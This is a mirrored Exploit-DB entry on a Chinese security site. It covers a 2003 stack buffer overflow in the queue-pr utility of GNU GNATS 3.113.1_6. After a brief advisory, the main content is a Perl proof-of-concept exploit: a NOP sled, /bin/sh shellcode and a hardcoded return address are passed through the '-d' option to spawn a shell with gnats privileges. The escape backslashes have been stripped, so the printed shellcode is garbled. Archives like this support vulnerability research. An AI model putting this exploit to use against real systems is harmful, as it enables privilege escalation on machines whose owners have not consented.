GNU GNATS 3.113.1_6 – Queue-PR Database Command Line Option Buffer Overflow

GNU GNATS 3.113.1_6 – Queue-PR Database Command Line Option Buffer Overflow

漏洞ID 1054047 漏洞类型
发布时间 2003-07-21 更新时间 2003-07-21
图片[1]-GNU GNATS 3.113.1_6 – Queue-PR Database Command Line Option Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-GNU GNATS 3.113.1_6 – Queue-PR Database Command Line Option Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22939
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8232/info

A stack overflow vulnerability has been reported for the queue-pr utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option. 

Successful exploitation may result in the execution of attacker-supplied code with potentially elevated privileges.

#!/usr/bin/perl

# Simple PoC exploit for gnats
# Tested on FreeBSD 5.0 with gnats-3.113.1_6
# if all works it gives gnats access

# Code by inv[at]dtors

$ret_hex = 0xbfbffb90;
$shellcode ="x99x52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x54x53x52x31xc0xb0x3bxcdx80x31xc0xb0x01xcdx80";
$nops = "x90"x1110;
$ret = pack('l', $ret_hex);

$exploit = "$nops"."$shellcode"."$ret"."$ret";
local($ENV{'EXP'}) = $exploit; 

print "ndtors gnats exploitn";
print "code by invnn";
print ("Address: 0x", sprintf('%lx', $ret_hex),"nn");

system('/usr/local/libexec/gnats/queue-pr -d $EXP -O bbb');

相关推荐: Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability

Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability 漏洞ID 1103773 漏洞类型 Access Validation Error 发布时间 2000-10-10 更新时间…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享